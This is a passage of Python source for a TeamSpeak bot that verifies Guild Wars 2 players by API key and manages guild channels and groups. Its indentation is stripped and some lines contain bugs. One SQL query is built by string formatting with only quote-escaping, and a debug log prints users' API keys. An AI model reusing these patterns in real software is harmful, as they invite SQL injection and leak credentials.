client_db_id = user.ts_db_id
ts_groups = {sg.get("name"):sg.get("sgid") for sg in self.ts_connection.ts3exec(lambda ts_connection: ts_connection.query("servergrouplist").all())[0]}
ingame_member_of = set(auth.guild_names)
# names of all groups the user is in, not just guild ones
current_group_names = []
try:
current_group_names = [g.get("name") for g in self.ts_connection.ts3exec(lambda ts_connection: ts_connection.query("servergroupsbyclientid", cldbid = client_db_id).all(), signal_exception_handler)[0]]
except TypeError as e:
# user had no groups (results in None, instead of an empty list) -> just stick with the []
pass
# data of all guild groups the user is in
param = ",".join(["'%s'" % (cgn.replace('"', '\\"').replace("'", "\\'"),) for cgn in current_group_names])
# sanitisation is restricted to replacing single and double quotes. This should not be that much of a problem, since
# the input for the parameters here are the names of our own server groups on our TS server.
current_guild_groups = []
hidden_groups = {}
with self.dbc.lock:
current_guild_groups = self.dbc.cursor.execute("SELECT ts_group, guild_name FROM guilds WHERE ts_group IN (%s)" % (param,)).fetchall()
# groups the user doesn't want to wear
hidden_groups = set([g[0] for g in self.dbc.cursor.execute("SELECT g.ts_group FROM guild_ignores AS gi JOIN guilds AS g ON gi.guild_id = g.guild_id WHERE ts_db_id = ?", (uid,))])
# REMOVE STALE GROUPS
for ggroup, gname in current_guild_groups:
if ggroup in hidden_groups:
log.info("Player %s chose to hide group '%s', which is now removed.", auth.name, ggroup)
self.ts_connection.ts3exec(lambda ts_connection: ts_connection.exec_("servergroupdelclient", sgid = ts_groups[ggroup], cldbid = client_db_id))
elif not gname in ingame_member_of:
if ggroup not in ts_groups:
log.warning("Player %s should be removed from the TS group '%s' because they are not a member of guild '%s'. But no matching group exists. You should remove the entry for this guild from the db or check the spelling of the TS group in the DB. Skipping.", ggroup, auth.name, gname)
else:
log.info("Player %s is no longer part of the guild '%s'. Removing attached group '%s'.", auth.name, gname, ggroup)
self.ts_connection.ts3exec(lambda ts_connection: ts_connection.exec_("servergroupdelclient", sgid = ts_groups[ggroup], cldbid = client_db_id))
# ADD DUE GROUPS
for g in ingame_member_of:
ts_group = None
with self.dbc.lock:
ts_group = self.dbc.cursor.execute("SELECT ts_group FROM guilds WHERE guild_name = ?", (g,)).fetchone()
if ts_group:
ts_group = ts_group[0] # first and only column, if a row exists
if ts_group not in current_group_names:
if ts_group in hidden_groups:
log.info("Player %s is entitled to TS group '%s', but chose to hide it. Skipping.", auth.name, ts_group)
else:
if ts_group not in ts_groups:
log.warning("Player %s should be assigned the TS group '%s' because they are member of guild '%s'. But the group does not exist. You should remove the entry for this guild from the db or create the group. Skipping.", auth.name, ts_group, g)
else:
log.info("Player %s is member of guild '%s' and will be assigned the TS group '%s'.", auth.name, g, ts_group)
self.ts_connection.ts3exec(lambda ts_connection: ts_connection.exec_("servergroupaddclient", sgid = ts_groups[ts_group], cldbid = client_db_id))
def auditUsers(self):
import threading
threading.Thread(target=self._auditUsers).start()
def _auditUsers(self):
        self.c_audit_date = datetime.date.today() #Update current date on every run
        self.db_audit_list = []
        with self.dbc.lock:
            self.db_audit_list = self.dbc.cursor.execute('SELECT * FROM users').fetchall()
for audit_user in self.db_audit_list:
#Convert to single variables
audit_ts_id = audit_user[0]
audit_account_name = audit_user[1]
audit_api_key = audit_user[2]
audit_created_date = audit_user[3]
audit_last_audit_date = audit_user[4]
log.debug("Audit: User %s", audit_account_name)
log.debug("TODAY |%s| NEXT AUDIT |%s|", self.c_audit_date, audit_last_audit_date + datetime.timedelta(days = Config.audit_period))
#compare audit date
if self.c_audit_date >= audit_last_audit_date + datetime.timedelta(days = Config.audit_period):
log.info("User %s is due for auditing!", audit_account_name)
auth = TS3Auth.AuthRequest(audit_api_key, audit_account_name)
if auth.success:
log.info("User %s is still on %s. Succesful audit!", audit_account_name, auth.world.get("name"))
#self.getTsDatabaseID(audit_ts_id)
self.updateGuildTags(User(self.ts_connection, unique_id = audit_ts_id), auth)
with self.dbc.lock:
self.dbc.cursor.execute("UPDATE users SET last_audit_date = ? WHERE ts_db_id= ?", (self.c_audit_date, audit_ts_id,))
self.dbc.conn.commit()
else:
log.info("User %s is no longer on our server. Removing access....", audit_account_name)
self.removePermissions(audit_ts_id)
self.removeUserFromDB(audit_ts_id)
with self.dbc.lock:
self.dbc.cursor.execute('INSERT INTO bot_info (last_succesful_audit) VALUES (?)', (self.c_audit_date,))
self.dbc.conn.commit()
def broadcastMessage(self):
self.ts_connection.ts3exec(lambda ts_connection: ts_connection.exec_("sendtextmessage", targetmode = 2, target = self._ts_connection._server_id, msg = Config.locale.get("bot_msg_broadcast")))
def getActiveTsUserID(self, client_unique_id):
return self.ts_connection.ts3exec(lambda ts_connection: ts_connection.query("clientgetids", cluid = client_unique_id).first().get('clid'))[0]
def getTsDatabaseID(self, client_unique_id):
return self.ts_connection.ts3exec(lambda ts_connection: ts_connection.query("clientgetdbidfromuid", cluid = client_unique_id).first().get('cldbid'))[0]
def getTsUniqueID(self, client_db_id):
return self.ts_connection.ts3exec(lambda ts_connection: ts_connection.query("clientgetnamefromdbid", cldbid = client_db_id).first().get('cluid'))[0]
def loginEventHandler(self, event):
raw_sgroups = event.parsed[0].get('client_servergroups')
raw_clid = event.parsed[0].get('clid')
raw_cluid = event.parsed[0].get('client_unique_identifier')
if raw_clid == self.client_id:
return
if self.clientNeedsVerify(raw_cluid):
self.ts_connection.ts3exec(lambda ts_connection: ts_connection.exec_("sendtextmessage", targetmode = 1, target = raw_clid, msg = Config.locale.get("bot_msg_verify")),
ignore_exception_handler) # error 516: invalid client type: another query-client logged in
def commandCheck(self, command_string):
action=(None, None)
for allowed_cmd in Config.cmd_list:
            if re.match(r'(^%s)\s*' % (allowed_cmd,), command_string):
toks = command_string.split() # no argument for split() splits on arbitrary whitespace
action = (toks[0], toks[1:])
return action
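    # Illustrative behaviour (assuming "setresetroster" is listed in Config.cmd_list):
    #   commandCheck("setresetroster 01.01.2020")  ->  ("setresetroster", ["01.01.2020"])
    #   commandCheck("unknowncommand")             ->  (None, None)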
def try_get(self, dictionary, key, lower = False, typer = lambda x: x, default = None):
v = typer(dictionary[key] if key in dictionary else default)
return v.lower() if lower and isinstance(v, str) else v
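    # Illustrative behaviour (sketch): try_get({"name": "Example"}, "name", lower=True)
    # returns "example", while a missing key falls back to the supplied default after
    # being passed through `typer`.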
def setResetroster(self, ts3conn, date, red = [], green = [], blue = [], ebg = []):
leads = ([], red, green, blue, ebg) # keep RGB order! EBG as last! Pad first slot (header) with empty list
channels = [(p,c.replace("$DATE", date)) for p,c in Config.reset_channels]
for i in range(len(channels)):
pattern, clean = channels[i]
lead = leads[i]
chan, ts3qe = ts3conn.ts3exec(lambda tsc: tsc.query("channelfind", pattern = pattern).first(), signal_exception_handler)
if ts3qe is not None:
if hasattr(ts3qe,"resp") and ts3qe.resp.error["id"] == "1281":
# empty result set
# no channel found for that pattern
log.warning("No channel found with pattern '%s'. Skipping.", pattern)
else:
log.error("Unexpected exception while trying to find a channel: %s", ts3qe)
raise ts3qe
else:
#newname = "%s%s" % (clean, ", ".join(lead))
TS3_MAX_SIZE_CHANNEL_NAME = 40
shortened = StringShortener(TS3_MAX_SIZE_CHANNEL_NAME - len(clean)).shorten(lead)
                newname = "%s%s" % (clean, ", ".join(shortened))
_, ts3qe = ts3conn.ts3exec(lambda tsc: tsc.exec_("channeledit", cid = chan.get("cid"), channel_name = newname), signal_exception_handler)
if ts3qe is not None and ts3qe.resp.error["id"] == "771":
# channel name already in use
# probably not a bug (channel still unused), but can be a config problem
log.info("Channel '%s' already exists. This is probably not a problem. Skipping.", newname)
def getGuildInfo(self, guildname):
'''
Lookup guild by name. If such a guild exists (and the API is available)
the info as specified on https://wiki.guildwars2.com/wiki/API:2/guild/:id is returned.
Else, None is returned.
'''
ids = request("https://api.guildwars2.com/v2/guild/search?name=%s" % (urllib.parse.quote(guildname),))
return None if ids is None or len(ids) == 0 else request("https://api.guildwars2.com/v2/guild/%s" % (ids[0]))
def removeGuild(self, name):
'''
Removes a guild from the TS. That is:
- deletes their guild channel and all their subchannels by force
- removes the group from TS by force
- remove the auto-assignment for that group from the DB
name: name of the guild as in the game
'''
SUCCESS = 0
INVALID_GUILD_NAME = 1
NO_DB_ENTRY = 2
INVALID_PARAMETERS = 5
if name is None:
return INVALID_PARAMETERS
ginfo = self.getGuildInfo(name)
if ginfo is None:
return INVALID_GUILD_NAME
with self.dbc.lock:
g = self.dbc.cursor.execute("SELECT ts_group FROM guilds WHERE guild_name = ?", (name,)).fetchone()
groupname = g[0] if g is not None else None
if groupname is None:
return NO_DB_ENTRY
ts3conn = self.ts_connection
tag = ginfo.get("tag")
# FROM DB
log.debug("Deleting guild '%s' from DB.", name)
with self.dbc.lock:
self.dbc.cursor.execute("DELETE FROM guilds WHERE guild_name = ?", (name,))
self.dbc.conn.commit()
# CHANNEL
channelname = "%s [%s]" % (name, tag)
channel, ex = ts3conn.ts3exec(lambda tsc: tsc.query("channelfind", pattern = channelname).first(), signal_exception_handler)
if channel is None:
log.debug("No channel '%s' to delete.", channelname)
else:
log.debug("Deleting channel '%s'.", channelname)
ts3conn.ts3exec(lambda tsc: tsc.exec_("channeldelete", cid = channel.get("cid"), force = 1))
# GROUP
groups, ex = ts3conn.ts3exec(lambda tsc: tsc.query("servergrouplist").all())
group = next((g for g in groups if g.get("name") == groupname), None)
if group is None:
log.debug("No group '%s' to delete.", groupname)
else:
log.debug("Deleting group '%s'.", groupname)
ts3conn.ts3exec(lambda tsc: tsc.exec_("servergroupdel", sgid = group.get("sgid"), force = 1))
return SUCCESS
def createGuild(self, name, tag, groupname, contacts):
'''
Creates a guild in the TS.
- retrieves and uploads their emblem as icon
- creates guild channel with subchannels as read from the config with the icon
- creates a guild group with the icon and appropriate permissions
- adds in automatic assignment of the guild group upon re-verification
- adds the contact persons as initial channel description
- gives the contact role to the contact persons if they can be found in the DB
name: name of the guild as is seen ingame
tag: their tag
groupname: group that should be used for them. Useful if the tag is already taken
contacts: list of account names (Foo.1234) that should be noted down as contact and receive the special role for the new channel
returns: 0 for success or an error code indicating the problem (see below)
'''
SUCCESS = 0
DUPLICATE_TS_GROUP = 1
DUPLICATE_DB_ENTRY = 2
DUPLICATE_TS_CHANNEL = 3
MISSING_PARENT_CHANNEL = 4
INVALID_PARAMETERS = 5
if (name is None or tag is None or groupname is None or contacts is None
or len(name) < 3 or len(tag) < 2 or len(groupname) < 3
or not isinstance(contacts, list)):
return INVALID_PARAMETERS
ts3conn = self.ts_connection
channelname = "%s [%s]" % (name, tag)
channel_description = self.create_guild_channel_description(contacts, name, tag)
log.info("Creating guild '%s' with tag '%s', guild group '%s', and contacts '%s'." % (name, tag, groupname, ", ".join(contacts)))
# lock for the whole block to avoid constant interference
# locking the ts3conn is vital to properly do the TS3FileTransfer
# down the line.
with ts3conn.lock, self.dbc.lock:
#############################################
# CHECK IF GROUPS OR CHANNELS ALREADY EXIST #
#############################################
log.debug("Doing preliminary checks.")
groups, ex = ts3conn.ts3exec(lambda tsc: tsc.query("servergrouplist").all(), default_exception_handler)
group = next((g for g in groups if g.get("name") == groupname), None)
if group is not None:
# group already exists!
log.debug("Can not create a group '%s', because it already exists. Aborting guild creation.", group)
return DUPLICATE_TS_GROUP
with self.dbc.lock:
dbgroups = self.dbc.cursor.execute("SELECT ts_group, guild_name FROM guilds WHERE ts_group = ?", (groupname,)).fetchall()
if(len(dbgroups) > 0):
log.debug("Can not create a DB entry for TS group '%s', as it already exists. Aborting guild creation.", groupname)
return DUPLICATE_DB_ENTRY
channel, ex = ts3conn.ts3exec(lambda tsc: tsc.query("channelfind", pattern = channelname).first(), signal_exception_handler)
if channel is not None:
# channel already exists!
log.debug("Can not create a channel '%s', as it already exists. Aborting guild creation.", channelname)
return DUPLICATE_TS_CHANNEL
parent, ex = ts3conn.ts3exec(lambda tsc: tsc.query("channelfind", pattern = Config.guilds_parent_channel).first(), signal_exception_handler)
if parent is None:
# parent channel does not exist!
log.debug("Can not find a parent-channel '%s' for guilds. Aborting guild creation.", Config.guilds_parent_channel)
return MISSING_PARENT_CHANNEL
log.debug("Checks complete.")
#Icon uploading
icon_id = self.handle_guild_icon(name, ts3conn) #Returns None if no icon
##################################
# CREATE CHANNEL AND SUBCHANNELS #
##################################
log.debug("Creating guild channels...")
pid = parent.get("cid")
info, ex = ts3conn.ts3exec(lambda tsc: tsc.query("channelinfo", cid = pid).all(), signal_exception_handler)
# assert channel and group both exist and parent channel is available
all_guild_channels = [c for c in ts3conn.ts3exec(lambda tc: tc.query("channellist").all(), signal_exception_handler)[0] if c.get("pid") == pid]
all_guild_channels.sort(key=lambda c: c.get("channel_name"), reverse = True)
# Assuming the channels are already in order on the server,
# find the first channel whose name is alphabetically smaller than the new channel name.
# The sort_order of channels actually specifies after which channel they should be
# inserted. Giving 0 as sort_order puts them in first place after the parent.
found_place = False
sort_order = 0
i = 0
while i < len(all_guild_channels) and not found_place:
if all_guild_channels[i].get("channel_name") > channelname:
i += 1
else:
sort_order = int(all_guild_channels[i].get("cid"))
found_place = True
cinfo, ex = ts3conn.ts3exec(lambda tsc: tsc.query("channelcreate"
, channel_name = channelname
, channel_description = channel_description
, cpid = pid
, channel_flag_permanent = 1
, channel_maxclients = 0
, channel_order = sort_order
, channel_flag_maxclients_unlimited = 0)
.first(), signal_exception_handler)
perms = [("i_channel_needed_join_power", 25),
("i_channel_needed_subscribe_power", 25),
("i_channel_needed_modify_power", 45),
("i_channel_needed_delete_power", 75)
]
if icon_id is not None:
perms.append(("i_icon_id", icon_id))
def channeladdperm(cid, permsid, permvalue):
return ts3conn.ts3exec(lambda tsc: tsc.exec_("channeladdperm"
, cid = cid
, permsid = permsid
, permvalue = permvalue
, permnegated = 0
, permskip = 0)
, signal_exception_handler)
for p,v in perms:
_, ex = channeladdperm(cinfo.get("cid"), p, v)
for c in Config.guild_sub_channels:
# FIXME: error check
res, ex = ts3conn.ts3exec(lambda tsc: tsc.query("channelcreate"
, channel_name = c
, cpid = cinfo.get("cid")
, channel_flag_permanent = 1)
.first(), signal_exception_handler)
###################
# CREATE DB GROUP #
###################
# must exist in DB before creating group to have it available when reordering groups.
log.debug("Creating entry in database for auto assignment of guild group...")
with self.dbc.lock:
self.dbc.cursor.execute("INSERT INTO guilds(ts_group, guild_name) VALUES(?,?)", (groupname, name))
self.dbc.conn.commit()
#######################
# CREATE SERVER GROUP #
#######################
log.debug("Creating and configuring server group...")
resp, ex = ts3conn.ts3exec(lambda tsc: tsc.query("servergroupadd", name = groupname).first(), signal_exception_handler)
guildgroupid = resp.get("sgid")
if ex is not None and ex.resp.error["id"] == "1282":
log.warning("Duplication error while trying to create the group '%s' for the guild %s [%s]." % (groupname, name, tag))
def servergroupaddperm(sgid, permsid, permvalue):
return ts3conn.ts3exec(lambda tsc: tsc.exec_("servergroupaddperm"
, sgid = sgid
, permsid = permsid
, permvalue = permvalue
, permnegated = 0
, permskip = 0)
, signal_exception_handler)
perms = [
("b_group_is_permanent", 1),
("i_group_show_name_in_tree", 1),
("i_group_needed_modify_power", 75),
("i_group_needed_member_add_power", 50),
("i_group_needed_member_remove_power", 50),
("i_group_sort_id", Config.guilds_sort_id),
]
if icon_id is not None:
perms.append(("i_icon_id", icon_id))
for p,v in perms:
x,ex = servergroupaddperm(guildgroupid, p, v)
groups.append({"sgid": resp.get("sgid"), "name": groupname}) # the newly created group has to be added to properly iterate over the guild groups
guildgroups = []
with self.dbc.lock:
guildgroups = [g[0] for g in self.dbc.cursor.execute("SELECT ts_group FROM guilds ORDER BY ts_group").fetchall()]
for i in range(len(guildgroups)):
g = next((g for g in groups if g.get("name") == guildgroups[i]), None)
if g is None:
# error! Group deleted from TS, but not from DB!
log.warning("Found guild '%s' in the database, but no coresponding server group! Skipping this entry, but it should be fixed!", guildgroups[i])
else:
tp = Config.guilds_maximum_talk_power - i
if tp < 0:
log.warning("Talk power for guild %s is below 0.", g.get("name"))
# sort guild groups to have users grouped by their guild tag alphabetically in channels
x,ex = servergroupaddperm(g.get("sgid"), "i_client_talk_power", tp)
################
# ADD CONTACTS #
################
log.debug("Adding contacts...")
cgroups, ex = ts3conn.ts3exec(lambda tsc: tsc.query("channelgrouplist").all(), default_exception_handler)
contactgroup = next((cg for cg in cgroups if cg.get("name") == Config.guild_contact_channel_group), None)
if contactgroup is None:
log.debug("Can not find a group '%s' for guild contacts. Skipping.", contactgroup)
else:
for c in contacts:
with self.dbc.lock:
accs = [row[0] for row in self.dbc.cursor.execute("SELECT ts_db_id FROM users WHERE lower(account_name) = lower(?)", (c,)).fetchall()]
for a in accs:
errored = False
try:
u = User(ts3conn, unique_id = a, ex_hand = signal_exception_handler)
tsdbid = u.ts_db_id
_, ex = ts3conn.ts3exec(lambda tsc: tsc.exec_("setclientchannelgroup"
, cid = cinfo.get("cid")
, cldbid = tsdbid
, cgid = contactgroup.get("cgid"))
, signal_exception_handler)
# while we are at it, add the contacts to the guild group as well
_, ex2 = ts3conn.ts3exec(lambda tsc: tsc.exec_("servergroupaddclient"
, sgid = guildgroupid
, cldbid = tsdbid)
, signal_exception_handler)
errored = ex is not None
except Exception as ex:
errored = True
if errored:
log.error("Could not assign contact role '%s' to user '%s' with DB-unique-ID '%s' in guild channel for %s. Maybe the uid is not valid anymore."
, Config.guild_contact_channel_group, c, a, name)
return SUCCESS
def handle_guild_icon(self, name, ts3conn):
#########################################
# RETRIEVE AND UPLOAD GUILD EMBLEM ICON #
#########################################
log.debug("Retrieving and uploading guild emblem as icon from gw2mists...")
icon_url = "https://api.gw2mists.de/guilds/emblem/%s/50.svg" % (urllib.parse.quote(name),)
icon = requests.get(icon_url)
# funnily enough, giving an invalid guild (or one that has no emblem)
# results in HTTP 200, but a JSON explaining the error instead of an SVG image.
# Storing this JSON and uploading it to TS just fails silently without
# causing any problems!
# Therefore checking content length..
if len(icon.content) > 0:
icon_id = binascii.crc32(name.encode('utf8'))
icon_local_file_name = "%s_icon.svg" % (urllib.parse.quote(name),) # using name instead of tag, because tags are not unique
icon_server_path = "/icon_%s" % (icon_id,)
self.upload_icon(icon, icon_local_file_name, icon_server_path, ts3conn)
return icon_id
else:
log.debug("Empty Response. Guild probably has no icon. Skipping Icon upload.")
return None
def upload_icon(self, icon, icon_file_name, icon_server_path, ts3conn):
def _ts_file_upload_hook(c: ts3.response.TS3QueryResponse):
if (c is not None) and (c.parsed is not None) \
and (len(c.parsed) == 1) and (c.parsed[0] is not None) \
and "msg" in c.parsed[0].keys() and c.parsed[0]["msg"] == "invalid size":
from ts3.filetransfer import TS3UploadError
raise TS3UploadError(0, "The uploaded Icon is too large")
return None
with open(icon_file_name, "w+b") as fh:
try:
# svg
fh.write(icon.content)
fh.flush()
fh.seek(0)
# it is important to have acquired the lock for the ts3conn globally
# at this point, as we directly pass the wrapped connection around
upload = ts3.filetransfer.TS3FileTransfer(ts3conn.ts_connection)
res = upload.init_upload(input_file=fh,
name=icon_server_path,
cid=0,
query_resp_hook=lambda c: _ts_file_upload_hook(c))
log.info(f"Icon {icon_file_name} uploaded as {icon_server_path}.")
except ts3.common.TS3Error as ts3error:
log.error("Error Uploading icon {icon_file_name}.")
log.error(ts3error)
finally:
fh.close()
os.remove(icon_file_name)
def create_guild_channel_description(self, contacts, name, tag):
contacts = "\n".join([" • %s" % c for c in contacts])
text = (f"[center]\n"
f"[img]https://api.gw2mists.de/guilds/emblem/{urllib.parse.quote(name)}/128.svg[/img]\n"
f"[size=20]{name} - {tag}[/size]\n"
f"[/center]\n"
f"[hr]\n"
f"[size=12]Contacts:[/size]\n"
f"{contacts}\n"
f"[hr]\n")
return text
def clientMessageHandler(self, ipcserver, clientsocket, message):
mtype = self.try_get(message, "type", lower = True)
mcommand = self.try_get(message, "command", lower = True)
margs = self.try_get(message, "args", typer = lambda a: dict(a), default = {})
mid = self.try_get(message, "message_id", typer = lambda a: int(a), default = -1)
log.debug("[%s] %s", mtype, mcommand)
if mtype == "post":
# POST commands
if mcommand == "setresetroster":
mdate = self.try_get(margs, "date", default = "dd.mm.yyyy")
mred = self.try_get(margs, "rbl", default = [])
mgreen = self.try_get(margs, "gbl", default = [])
mblue = self.try_get(margs, "bbl", default = [])
mebg = self.try_get(margs, "ebg", default = [])
self.setResetroster(ipcserver.ts_connection, mdate, mred, mgreen, mblue, mebg)
if mcommand == "createguild":
mname = self.try_get(margs, "name", default = None)
mtag = self.try_get(margs, "tag", default = None)
mgroupname = self.try_get(margs, "tsgroup", default = mtag)
mcontacts = self.try_get(margs, "contacts", default = [])
res = -1 if mname is None or mtag is None else self.createGuild(mname, mtag, mgroupname, mcontacts)
clientsocket.respond(mid, mcommand, {"status": res})
if mtype == "delete":
# DELETE commands
if mcommand == "user":
mgw2account = self.try_get(margs,"gw2account", default = "")
log.info("Received request to delete user '%s' from the TS registration database.", mgw2account)
changes = self.removePermissionsByGW2Account(mgw2account)
clientsocket.respond(mid, mcommand, {"deleted": changes})
if mcommand == "guild":
mname = self.try_get(margs, "name", default = None)
log.info("Received request to delete guild %s", mname)
res = self.removeGuild(mname)
print(res)
clientsocket.respond(mid, mcommand, {"status": res})
# Handler that is used every time an event (message) is received from teamspeak server
def messageEventHandler(self, event):
"""
*event* is a ts3.response.TS3Event instance, that contains the name
of the event and the data.
"""
log.debug("event.event: %s", event.event)
raw_cmd = event.parsed[0].get('msg')
rec_from_name = event.parsed[0].get('invokername').encode('utf-8') #fix any encoding issues introduced by Teamspeak
rec_from_uid = event.parsed[0].get('invokeruid')
rec_from_id = event.parsed[0].get('invokerid')
rec_type = event.parsed[0].get('targetmode')
if rec_from_id == self.client_id:
return #ignore our own messages.
try:
# Type 2 means it was channel text
if rec_type == "2":
cmd, args = self.commandCheck(raw_cmd) #sanitize the commands but also restricts commands to a list of known allowed commands
if cmd == "hideguild":
log.info("User '%s' wants to hide guild '%s'.", rec_from_name, args[0])
with self.dbc.lock:
try:
self.dbc.cursor.execute("INSERT INTO guild_ignores(guild_id, ts_db_id, ts_name) VALUES((SELECT guild_id FROM guilds WHERE ts_group = ?), ?,?)", (args[0], rec_from_uid, rec_from_name))
self.dbc.conn.commit()
log.debug("Success!")
self.ts_connection.ts3exec(lambda tsc: tsc.exec_("sendtextmessage", targetmode = 1, target = rec_from_id, msg = Config.locale.get("bot_hide_guild_success")))
except sqlite3.IntegrityError:
self.dbc.conn.rollback()
log.debug("Failed. The group probably doesn't exist or the user is already hiding that group.")
self.ts_connection.ts3exec(lambda tsc: tsc.exec_("sendtextmessage", targetmode = 1, target = rec_from_id, msg = Config.locale.get("bot_hide_guild_unknown")))
elif cmd == "unhideguild":
log.info("User '%s' wants to unhide guild '%s'.", rec_from_name, args[0])
with self.dbc.lock:
self.dbc.cursor.execute("DELETE FROM guild_ignores WHERE guild_id = (SELECT guild_id FROM guilds WHERE ts_group = ? AND ts_db_id = ?)", (args[0], rec_from_uid))
                        changes = self.dbc.cursor.execute("SELECT changes()").fetchone()[0]
self.dbc.conn.commit()
if changes > 0:
log.debug("Success!")
self.ts_connection.ts3exec(lambda tsc: tsc.exec_("sendtextmessage", targetmode = 1, target = rec_from_id, msg = Config.locale.get("bot_unhide_guild_success")))
else:
log.debug("Failed. Either the guild is unknown or the user had not hidden the guild anyway.")
self.ts_connection.ts3exec(lambda tsc: tsc.exec_("sendtextmessage", targetmode = 1, target = rec_from_id, msg = Config.locale.get("bot_unhide_guild_unknown")))
elif cmd == 'verifyme':
return # command disabled for now
if self.clientNeedsVerify(rec_from_uid):
log.info("Verify Request Recieved from user '%s'. Sending PM now...\n ...waiting for user response.", rec_from_name)
self.ts_connection.ts3exec(lambda tsc: tsc.exec_("sendtextmessage", targetmode = 1, target = rec_from_id, msg = Config.locale.get("bot_msg_verify")))
else:
log.info("Verify Request Recieved from user '%s'. Already verified, notified user.", rec_from_name)
self.ts_connection.ts3exec(lambda tsc: tsc.exec_("sendtextmessage", targetmode = 1, target = rec_from_id, msg = Config.locale.get("bot_msg_alrdy_verified")))
# Type 1 means it was a private message
elif rec_type == '1':
#reg_api_auth='\s*(\S+\s*\S+\.\d+)\s+(.*?-.*?-.*?-.*?-.*)\s*$'
                reg_api_auth = r'\s*(.*?-.*?-.*?-.*?-.*)\s*$'
#Command for verifying authentication
if re.match(reg_api_auth, raw_cmd):
pair = re.search(reg_api_auth, raw_cmd)
uapi = pair.group(1)
if self.clientNeedsVerify(rec_from_uid):
log.info("Received verify response from %s", rec_from_name)
auth = TS3Auth.AuthRequest(uapi)
log.debug('Name: |%s| API: |%s|' % (auth.name, uapi))
if auth.success:
limit_hit = self.TsClientLimitReached(auth.name)
if Config.DEBUG:
log.debug("Limit hit check: %s", limit_hit)
if not limit_hit:
log.info("Setting permissions for %s as verified.", rec_from_name)
#set permissions
self.setPermissions(rec_from_uid)
#get todays date
today_date = datetime.date.today()
#Add user to database so we can query their API key over time to ensure they are still on our server
self.addUserToDB(rec_from_uid, auth.name, uapi, today_date, today_date)
self.updateGuildTags(User(self.ts_connection, unique_id = rec_from_uid, ex_hand = signal_exception_handler), auth)
# self.updateGuildTags(rec_from_uid, auth)
log.debug("Added user to DB with ID %s", rec_from_uid)
#notify user they are verified
self.ts_connection.ts3exec(lambda tsc: tsc.exec_("sendtextmessage", targetmode = 1, target = rec_from_id, msg = Config.locale.get("bot_msg_success")))
else:
# client limit is set and hit
self.ts_connection.ts3exec(lambda tsc: tsc.exec_("sendtextmessage", targetmode = 1, target = rec_from_id, msg = Config.locale.get("bot_msg_limit_Hit")))
log.info("Received API Auth from %s, but %s has reached the client limit.", rec_from_name, rec_from_name)
else:
#Auth Failed
self.ts_connection.ts3exec(lambda tsc: tsc.exec_("sendtextmessage", targetmode = 1, target = rec_from_id, msg = Config.locale.get("bot_msg_fail")))
else:
log.debug("Received API Auth from %s, but %s is already verified. Notified user as such.", rec_from_name, rec_from_name)
self.ts_connection.ts3exec(lambda tsc: tsc.exec_("sendtextmessage", targetmode = 1, target = rec_from_id, msg = Config.locale.get("bot_msg_alrdy_verified")))
else:
self.ts_connection.ts3exec(lambda tsc: tsc.exec_("sendtextmessage", targetmode = 1, target = rec_from_id, msg = Config.locale.get("bot_msg_rcv_default")))
log.info("Received bad response from %s [msg= %s]", rec_from_name, raw_cmd.encode('utf-8'))
# sys.exit(0)
except Exception as e:
log.error("BOT Event: Something went wrong during message received from teamspeak server. Likely bad user command/message.")
log.error(e)
log.error(traceback.format_exc())
return None
#######################################
class Ticker(object):
'''
Class that schedules events regularly and wraps the TS3Bot.
'''
def __init__(self, ts3bot, interval):
self.ts3bot = ts3bot
self.interval = interval
schedule.every(interval).seconds.do(self.execute)
def execute(self):
pass
#######################################
class Channel(object):
def __init__(self, ts_conn, channel_id):
self.ts_conn = ts_conn
self.channel_id = channel_id
#######################################
class User(object):
'''
    Class that makes user-specific calls to the TeamSpeak API more convenient.
Since calls to the API are penalised, the class also tries to minimise those calls
by only resolving properties when they are actually needed and then caching them (if sensible).
'''
def __init__(self, ts_conn, unique_id = None, ts_db_id = None, client_id = None, ex_hand = None):
self.ts_conn = ts_conn
self._unique_id = unique_id
self._ts_db_id = ts_db_id
self._client_id = client_id
self._exception_handler = ex_hand if ex_hand is not None else default_exception_handler
if all(x is None for x in [unique_id, ts_db_id, client_id]):
raise Error("At least one ID must be non-null")
def __repr__(self):
return str(self)
def __str__(self):
return "User[unique_id: %s, ts_db_id: %s, client_id: %s]" % (self.unique_id, self.ts_db_id, self._client_id)
@property
def current_channel(self):
entry = next((c for c in self.ts_conn.ts3exec(lambda t: t.query("clientlist").all(), self._exception_handler)[0] if c.get("clid") == self.client_id), None)
if entry:
self._ts_db_id = entry.get("client_database_id") # since we are already retrieving this information...
return Channel(self.ts_conn, entry.get("cid")) if entry else None
@property
def name(self):
return self.ts_conn.ts3exec(lambda t: t.query("clientgetids", cluid = self.unique_id).first().get("name"), self._exception_handler)[0]
@property
def unique_id(self):
if self._unique_id is None:
if self._ts_db_id is not None:
self._unique_id, ex = self.ts_conn.ts3exec(lambda t: t.query("clientgetnamefromdbid", cldbid = self._ts_db_id).first().get("cluid"), self._exception_handler)
elif self._client_id is not None:
ids, ex = self.ts_conn.ts3exec(lambda t: t.query("clientinfo", clid = self._client_id).first(), self._exception_handler)
self._unique_id = ids.get("client_unique_identifier")
self._ts_db_id = ids.get("client_databased_id") # not required, but since we already queried it...
else:
raise Error("Unique ID can not be retrieved")
return self._unique_id
@property
def ts_db_id(self):
if self._ts_db_id is None:
if self._unique_id is not None:
self._ts_db_id, ex = self.ts_conn.ts3exec(lambda t: t.query("clientgetdbidfromuid", cluid = self._unique_id).first().get("cldbid"), self._exception_handler)
elif self._client_id is not None:
ids, ex = self.ts_conn.ts3exec(lambda t: t.query("clientinfo", clid = self._client_id).first(), self._exception_handler)
self._unique_id = ids.get("client_unique_identifier") # not required, but since we already queried it...
self._ts_db_id = ids.get("client_database_id")
else:
raise Error("TS DB ID can not be retrieved")
return self._ts_db_id
@property
def client_id(self):
if self._client_id is None:
if self._unique_id is not None:
# easiest case: unique ID is set
self._client_id, ex = self.ts_conn.ts3exec(lambda t: t.query("clientgetids", cluid = self._unique_id).first().get("clid"), self._exception_handler)
elif self._ts_db_id is not None:
self._unique_id, ex = self.ts_conn.ts3exec(lambda t: t.query("clientgetnamefromdbid", cldbid = self._ts_db_id).first().get("cluid"), self._exception_handler)
self._client_id, ex = self.ts_conn.ts3exec(lambda t: t.query("clientgetids", cluid = self._unique_id).first().get("clid"), self._exception_handler)
else:
raise Error("Client ID can not be retrieved")
return self._client_id
#######################################
class CommanderChecker(Ticker):
def __init__(self, ts3bot, ipcserver, commander_group_names, interval = 60):
super(CommanderChecker, self).__init__(ts3bot, interval)
self.commander_group_names = commander_group_names
self.ipcserver = ipcserver
